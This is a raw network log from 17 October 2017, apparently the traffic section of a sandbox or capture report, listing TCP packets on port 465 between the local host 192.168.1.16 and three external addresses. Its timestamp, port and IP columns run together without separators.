Okt 17, 2017 21:54:46.939769983 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.333585024 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.334115982 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.334160089 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.334346056 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.334372997 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.334968090 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.334997892 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.335872889 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.335906982 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.693322897 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.694333076 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.694365978 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:47.694761038 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:47.694785118 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.148077011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.148736000 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:48.148781061 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.149578094 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:48.149606943 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.452172995 MESZ49245465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:48.452310085 MESZ4654924591.136.8.189192.168.1.16
Okt 17, 2017 21:54:48.452728033 MESZ49245465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:48.553920984 MESZ49246465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:48.554048061 MESZ4654924691.136.8.189192.168.1.16
Okt 17, 2017 21:54:48.554511070 MESZ49246465192.168.1.1691.136.8.189
Okt 17, 2017 21:54:48.577534914 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.577929020 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:48.577967882 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:48.578135014 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:48.578159094 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.024512053 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.024852991 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.024893999 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.025068045 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.025091887 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.026019096 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.026041031 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.026248932 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.026272058 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.386991024 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.387434959 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.387473106 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.387639046 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.387660980 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.850192070 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.850400925 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.850435019 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:49.852505922 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:49.852530956 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.291621923 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.291939020 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.291980982 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.295162916 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.295190096 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.713313103 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.713785887 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.713808060 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.713943005 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.713959932 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.714602947 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.714618921 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:50.714751959 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:50.714767933 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.125188112 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.125607014 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.125644922 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.125811100 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.125833988 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.575413942 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.576515913 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.576544046 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.576927900 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.576947927 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.979665995 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.980295897 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.980328083 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:51.980734110 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:51.980756998 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.371953011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.372324944 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.372358084 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.372576952 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.372598886 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.373333931 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.373351097 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.373493910 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.373512030 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.725563049 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.725881100 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.725914001 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:52.726094007 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:52.726114988 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.162700891 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.163135052 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.163177013 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.163352966 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.163378000 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.558222055 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.558645010 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.558686018 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.558871984 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.558892965 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.656917095 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.657150984 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:53.657179117 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.662684917 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:53.662704945 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.835885048 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.836510897 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:53.836536884 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.836695910 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:53.836715937 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:53.997113943 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.997668028 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.997698069 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.998444080 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.998465061 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.998630047 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.998650074 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:53.999650002 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:53.999670029 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.041115999 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:54.043416977 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:54.043442965 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:54.043812990 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:54.043930054 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:54.044544935 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:54.364623070 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.365017891 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:54.365056992 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.367384911 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:54.367417097 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.802731991 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.803112030 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:54.803142071 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:54.803378105 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:54.803400040 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.214574099 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.214792967 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.214813948 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.216502905 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.216521025 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.652009964 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.652534962 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.652571917 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.652743101 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.652765036 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.653706074 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.653728962 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:55.653940916 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:55.653964043 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.038454056 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.040646076 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.040668011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.041424990 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.041440010 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.511650085 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.512033939 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.512067080 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.512233973 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.512255907 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.918900013 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.919842958 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.919882059 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:56.920053005 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:56.920075893 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.304934025 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.305241108 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.305263042 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.305357933 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.305372000 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.305875063 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.305887938 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.306327105 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.306341887 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.677500963 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.677783966 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.677810907 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:57.677934885 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:57.677952051 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.123215914 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.123585939 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:58.123617887 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.123815060 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:58.123836994 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.594897985 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.595213890 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:58.595243931 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:58.595762014 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:58.595791101 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.005987883 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.006537914 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.006565094 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.006670952 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.006689072 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.007221937 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.007241011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.007797003 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.007813931 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.373161077 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.373595953 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.373644114 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.374171972 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.374197006 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.829448938 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.829848051 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.829879999 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:59.830389023 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:59.830409050 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.223933935 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.224380016 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:00.224416971 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.224652052 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:00.224679947 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.655771017 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.656044960 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:00.656069040 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.656510115 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:00.656526089 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:00.657341957 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:00.657360077 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.063549995 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.063998938 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.064044952 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.064645052 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.064673901 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.490988016 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.491307974 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.491331100 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.491602898 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.491616964 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.902034044 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.902415037 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.902456045 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:01.902614117 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:01.902645111 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.294421911 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.294739962 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:02.294761896 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.295330048 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:02.295345068 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.295937061 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:02.295958996 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.651470900 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.651915073 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:02.651956081 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:02.652123928 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:02.652147055 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.130655050 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.131216049 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.131244898 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.131485939 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.131506920 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.531685114 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.532082081 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.532120943 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.532315016 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.532339096 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.939105034 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.939956903 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.939980984 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.940109968 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.940126896 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.940525055 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.940543890 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:03.941695929 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:03.941715002 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.317545891 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.317956924 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:04.317995071 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.318562984 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:04.318589926 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.766393900 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.766753912 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:04.766782045 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:04.767148972 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:04.767168045 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.175393105 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.175771952 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.175818920 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.176008940 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.176033020 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.578869104 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.579301119 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.579336882 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.580128908 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.580163956 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.580455065 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.580480099 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.580943108 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.580967903 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.582122087 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.582154989 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.954003096 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.954288006 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.954314947 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:05.954679966 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:05.954699993 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.480726957 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.480989933 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:06.481018066 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.481363058 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:06.481393099 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.900460958 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.900686026 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:06.900715113 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:06.903549910 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:06.903577089 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.297306061 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.297760010 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.297797918 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.297997952 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.298022985 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.298965931 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.298988104 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.299196959 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.299221992 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.698431015 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.698849916 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.698868990 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:07.698970079 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:07.698983908 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.160989046 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.161384106 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:08.161422014 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.161587000 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:08.161609888 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.586210966 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.607884884 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:08.607907057 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:08.608170986 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:08.608189106 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.045512915 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.045778990 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.045821905 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.046570063 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.046592951 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.046833038 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.046857119 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.047213078 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.047235966 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.415750027 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.416044950 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.416083097 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.416471004 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.416496992 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.945930958 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.946175098 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.946197987 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:09.947339058 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:09.947356939 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:10.349900961 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:10.350389957 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:10.350425959 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:10.350575924 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:10.350595951 MESZ46549196108.167.137.14192.168.1.16
